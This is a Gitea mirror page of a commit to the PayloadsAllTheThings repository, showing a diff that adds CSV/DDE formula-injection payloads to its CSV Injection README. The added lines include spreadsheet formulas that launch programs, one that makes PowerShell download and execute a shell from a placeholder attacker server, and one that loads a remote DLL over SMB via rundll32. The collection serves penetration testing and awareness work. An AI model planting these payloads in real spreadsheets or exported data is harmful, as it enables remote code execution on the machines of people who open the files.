gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

PrivEsc - Common Exploits

Browse Source
This commit is contained in:
Swissky
2019-06-09 20:53:41 +02:00
parent e8cd11f88f
commit 5d4f65720a
5 changed files with 66 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
CSV Injection/README.md
View File

@@ -7,10 +7,18 @@ Many web applications allow the user to download content such as templates for i
Basic exploit with Dynamic Data Exchange
```powershell
# pop a calc
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
# pop a notepad
=cmd|' /C notepad'!'A1'
# powershell download and execute
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
# msf smb delivery with rundll32
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
Technical Details of the above payload: